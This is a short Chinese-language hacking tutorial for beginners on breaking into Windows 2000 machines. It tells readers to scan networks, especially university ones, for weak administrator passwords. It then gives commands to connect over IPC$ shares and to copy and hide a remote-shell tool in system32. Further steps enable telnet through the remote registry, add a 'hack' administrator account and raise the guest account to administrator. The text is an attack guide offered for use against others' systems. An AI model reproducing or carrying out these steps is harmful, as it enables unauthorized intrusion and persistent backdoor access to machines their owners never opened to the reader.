最基礎的WIN2K入侵(菜鳥看）

最基礎的WIN2K入侵(菜鳥看）

最基礎的WIN2K入侵(菜鳥看）最基礎的WIN2K入侵(菜鳥看）
用掃描工具，找一個網段，尤其是高校的，你會發現，有很多弱口令，需要一個有admin權限的用戶，好了，開始工作。
方法1：
運行裏：[url=file:////ipaddress/c$]//ipaddress/c$[/url]
看看他的C盤裏有什麼東西，2K是不是安裝在C，
準備一個REMOTENC.EXE
運行裏：cmd.exe
在彈出的DOS窗口裏：
net use [url=file:////ipaddress/ipc$]//ipaddress/ipc$[/url]
等待，會讓你輸入用戶，密碼，
OK，提示連接成功以後
copy c:/remotenc.exe [url=file:////ipaddress/admin$/system32]//ipaddress/admin$/system32[/url]
(隱藏好一點，不然一下子就發現了)
提示，一個文copyed,好了，接着：
c:/>RemoteNC ipaddress administrator password RunasUser "RemoteNC" "Provide ocal CMD Redirect" 7 123456
（這是啓動remotnc）
ok ,現在可以telnet進去了
telnet ipaddress 7
等着輸入密碼了。
登陸以後：
net user hack 1234 /add
net localgroup administrators hack /add
net user guest /active:yes
net user guest 3214
net localgroup administrators guest /add
(加一個admin用戶，提升guest的權限)
好了，一切在你的手中................別太黑，（除非他讓你無法忍受）
方法2：
建立ipc連接
net use [url=file:////ipaddress/ipc$]//ipaddress/ipc$[/url]
運行：regedit
連接網絡註冊表
HKLM/SOFTWARE/MICROSOFT/TELNETSERVER/1.0
好啦，在右面找到NTLD，鍵值是2，改稱1/0
推出
接着來，彆着急
本機：控制面板－》管理工具—》計算機管理－》連接到另一臺計算機；
等待，出現提示框：輸入用戶名，密碼
ok 成功以後——
1－用戶管理，添加系統用戶
（有些主機禁止這項操作，就用方法1登陸上去，用指令添加）
2－看共享，把默認共享看看，有沒有你感興趣的東西
3－服務（這纔是大頭）
找到他的TELNET服務，右鍵屬性，改稱自動開啓
（如果已經啓動，必須重啓，因爲，畢竟，剛剛改過註冊表嗎～～）
好了，一切順利，
開啓DOS方式，直接TELNET吧～
它會問你什麼信息，什麼發送什麼的，Y／N，你點Y，就好了。
進入主機了，別太..............就好了